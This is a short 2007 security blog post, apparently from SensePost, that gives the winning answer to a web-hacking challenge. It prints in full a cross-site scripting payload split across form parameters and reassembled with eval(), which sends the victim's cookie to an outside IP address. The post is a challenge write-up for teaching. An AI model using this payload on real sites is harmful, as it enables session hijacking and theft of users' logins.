Grey bar Blue bar
Share this:

Tue, 24 Jul 2007

QoW 1 answered; Qow 2 released

A little while back we published our first public QoW for your abuse and enjoyment, and the time to close it is .......... now. The new QoW is available here. Thanks for the efforts; we received a fair number of answers and are still figuring out how to go about recording your submissions. For now, we'll publish the first correct answer, and discuss the answer in brief. Over to Haroon:

Jeremiah Grossman was the first correct answer, with valiant attempts from many others.. Acceptable solutions involved either the use of JavaScript / HTML comments to allow our injection to span multiple lines (or really really small urls :>)

An additional bonus for the attacker was that the form would accept as many name/value pairs submitted and returns them in the table allowing us to add variables forever..

original solution was therefore to submit:

http://qow.sensepost.com/cgi-bin/qow1/qow1?
name=<script>a='"http://'/*
&
address1=*/b='168.210.134.1/'/*
&
address3=*/c='?"+document'/*
&
moo1=*/d='.cookie'/*
&
moo2=*/f='document.location='/*
&
moo3=*/eval(f+a+b+c+d)/*
&
moo4=*/</script>
Effectively we build our JS command so that it fits into the imposed char limits, and use eval() eventually to pull them all together..

In our example we use it for a simple document.location to move off the cookie, but at that point the world is your oyster..

Ah well.. on with the show.. :>